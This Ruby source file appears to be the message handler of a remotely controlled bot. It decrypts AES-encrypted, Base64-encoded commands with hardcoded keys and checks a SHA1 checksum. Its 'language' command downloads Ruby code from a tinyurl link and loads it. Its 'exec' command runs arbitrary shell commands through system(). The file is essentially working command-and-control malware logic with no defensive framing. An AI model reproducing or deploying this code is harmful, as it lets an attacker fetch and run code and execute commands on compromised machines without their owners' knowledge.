require 'openssl'
require 'digest/sha1'
require 'base64'

# can't use constant as it gets redeclared when the require is done and so causes a warning
@dynamic_file_name="encrypted"

def calc_checksum message,verbose=false
	checksum = Digest::SHA1.hexdigest(message).slice(0,10)
	if verbose
		puts "Calculated SHA1 = "+checksum + " for " + message
	end
	return checksum
end

def process_message message, verbose=false
	if verbose
		puts "Using language file encrypted"
		puts "Processing message: " + message
	end

	if /^([a-zA-Z0-9\+\/=]*)ZZZ$/.match(message)
		encoded_message = $1
		if verbose
			puts "Base64 encoded message: "+encoded_message
		end
		
		decoded_message = Base64.decode64(encoded_message)
		cipher = OpenSSL::Cipher::Cipher.new("aes-256-cbc")
		cipher.decrypt
		cipher.key = Digest::SHA2.hexdigest("yourpass")
		cipher.iv = Digest::SHA2.hexdigest("yourpass2")

		decrypted_message = cipher.update(decoded_message)
		decrypted_message << cipher.final

		if verbose
			puts "Decrypted message is: " + decrypted_message
		end

		if /(.*)##([0-9a-zA-Z]{10})$/.match(decrypted_message)
			request=$1.strip
			checksum=$2
			puts "Request = "+request
			puts "Checksum = "+checksum

			calced_checksum=calc_checksum request, true

			if calced_checksum==checksum
				if verbose
					puts "Checksums match"
				end
				if /^([a-z]*) (.*)$/.match(request)
					command=$1.strip
					arguments=$2.strip

					if verbose
						puts "command: " + $1 + " args: " + arguments
					end
					case command
						when "language"
							if verbose
								puts "Now using dynamic file " + @dynamic_file_name
							end
							filename = Digest::SHA1.hexdigest(Time.now.to_s) + ".rb"
							url="http://tinyurl.com/"+arguments
							puts "downloading "+url
							if download_file url, filename
								require filename
								puts "Now using dynamic file " + @lang_file_name
							else
								puts "Download failed"
							end
						when "ping"
							ping arguments, verbose
						when "get"
							get_file arguments, verbose
						when "exec"
							if arguments!=""
								arguments.gsub!(/&amp;/, "&")
								if verbose
									puts "executing command - " + arguments
								end
								system(arguments)
							end
						else
							puts "Unknown command"
					end
				end
			else
				if verbose
					puts "Checksums DO NOT match"
				end
			end
		end
	end
end
